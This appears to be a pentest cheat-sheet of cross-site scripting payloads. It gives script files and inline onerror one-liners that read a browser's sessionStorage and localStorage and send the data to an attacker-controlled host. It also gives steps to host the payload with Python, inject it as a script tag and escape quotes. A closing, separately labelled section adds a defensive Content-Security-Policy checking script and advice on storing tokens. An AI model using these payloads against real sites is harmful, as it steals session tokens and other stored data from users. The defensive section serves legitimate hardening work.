SessionStorage
(data is kept only until tab is closed)
Hosting method:
- First create a file named sessionstorage.js with the following content:
    let data = JSON.stringify(sessionStorage);
    let encodedData = btoa(data);
    new Image().src = "http://domain/?ss=" + encodedData;
- Host the file using Python:
    python3 -m http.server 80
- Inject the payload:
    <script src="http://ownIP/sessionstorage.js"></script>
- Previous code in sessionstorage.js:
    let data = JSON.stringify(sessionStorage);
    let encodedData = encodeURIComponent(data);
    fetch("http://domain/?ss=" + encodedData);
One-liner alternative:
- Replace domain with a domain you control:
    <img src="x" onerror="fetch('http://domain/?ss='+encodeURIComponent(JSON.stringify(sessionStorage)))">
Note that you can use either single quotes or a backslash to escape the double quotes inside double quotes. Also, if the payload goes in a URL, the plus needs to be encoded as %2b.
LocalStorage
(data is kept until it is explicitly deleted)
Hosting method:
- First create a file named localstorage.js with the following content:
    let data = JSON.stringify(localStorage);
    let encodedData = btoa(data);
    new Image().src = "http://domain/?ls=" + encodedData;
- Host the file using Python:
    python3 -m http.server 80
- Inject the payload:
    <script src=http://ownIP/localstorage.js></script>
- Previous localstorage.js:
    let data = JSON.stringify(localStorage);
    let encodedData = encodeURIComponent(data);
    fetch("http://domain/?ls=" + encodedData);
One-liner alternative:
- Replace domain with a domain you control:
    <img src="x" onerror="fetch('http://domain/?ls='+encodeURIComponent(JSON.stringify(localStorage)))">
Note that you can use either single quotes or a backslash to escape the double quotes inside double quotes. Also, if the payload goes in a URL, the plus needs to be encoded as %2b.
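Added example, not part of the original page: every payload in both sections depends on the browser permitting one of four loads (an external script, an image request, a fetch, or an inline onerror handler), and each is governed by a different Content-Security-Policy directive. The sketch below reports which of those four a given policy header still permits; the collector.invalid URL, the function names and the simplified source matching are assumptions made for illustration.

```javascript
// Simplified CSP source matching: 'none', 'self', *, scheme sources and exact
// origins only (no wildcard hosts, paths, 'strict-dynamic', 'unsafe-hashes').
const OUTSIDE = "https://collector.invalid/"; // constructed third-party URL
function parseCsp(header) {
  const policy = Object.create(null);
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !(key in policy)) policy[key] = sources; // first occurrence wins
  }
  return policy;
}

// First directive in the fallback chain that is present; null = unrestricted.
function sourcesFor(policy, chain) {
  for (const d of chain) if (d in policy) return policy[d];
  return null;
}

function allowsUrl(sources, url, selfOrigin) {
  if (sources === null) return true;
  const u = new URL(url);
  return sources.some((s) => {
    if (s === "*") return true;
    if (s === "'self'") return u.origin === selfOrigin;
    if (/^[a-z][a-z0-9+.-]*:$/i.test(s)) return u.protocol === s.toLowerCase();
    if (/^https?:\/\//i.test(s)) return new URL(s).origin === u.origin;
    return false; // 'none', keywords, nonces, hashes, unsupported forms
  });
}

// Inline handlers (onerror=...) run only with an effective 'unsafe-inline';
// a nonce or hash in the same list makes browsers ignore 'unsafe-inline'.
function allowsInlineHandler(sources) {
  if (sources === null) return true;
  const hasNonceOrHash = sources.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  return sources.includes("'unsafe-inline'") && !hasNonceOrHash;
}

function auditCsp(header, selfOrigin) {
  const p = parseCsp(header);
  const url = (chain) => allowsUrl(sourcesFor(p, chain), OUTSIDE, selfOrigin);
  return {
    externalScript: url(["script-src-elem", "script-src", "default-src"]),
    imageBeacon: url(["img-src", "default-src"]),
    fetchBeacon: url(["connect-src", "default-src"]),
    inlineHandler: allowsInlineHandler(sourcesFor(p, ["script-src-attr", "script-src", "default-src"])),
  };
}
```

Any field that comes back true marks a directive to tighten. Keeping session tokens out of web storage (for example in HttpOnly cookies) removes what these payloads read in the first place.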